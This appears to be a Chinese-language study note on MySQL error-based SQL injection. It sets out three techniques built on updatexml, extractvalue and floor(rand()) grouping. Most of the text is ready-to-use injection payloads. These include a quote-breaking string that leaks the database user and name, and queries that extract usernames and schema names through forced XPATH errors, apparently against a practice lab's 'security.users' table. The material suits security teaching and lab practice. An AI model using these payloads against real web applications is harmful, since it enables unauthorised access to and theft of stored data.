报错注入的三种格式:
第一种: updatexml 修改格式函数 修改格式不符合 报错
函数解释:
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,第二个参数:XPath_string (Xpath格式的字符串) ,
第三个参数:new_value,String格式,替换查找到的符合条件的数据
而我们的注入语句为:
select updatexml(1,concat(0x7e,(SELECT username from security.users limit 0,1),0x7e),1);
其中的concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出
ERROR 1105 (HY000): XPATH syntax error: '~Dumb~'
select updatexml(1,concat(0x7e,(构造语句)),1);
updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1)
第二种 extractvalue()函数报错注入 查询函数 不符合报错
函数解释:
extractvalue():从目标XML中返回包含所查询值的字符串。
EXTRACTVALUE (XML_document, XPath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串)
concat:返回结果为连接参数产生的字符串。
1' and extractvalue(1,concat(0x7e,user(),0x7e,database())) -- //爆数据库信息
1' and extractvalue(1,(构造语句))
第三种:floor()报错注入语句格式:
函数解释:
要求列数一致
select count(*), concat(floor(rand(0)*2),database()) x from information_schema. schemata group by x;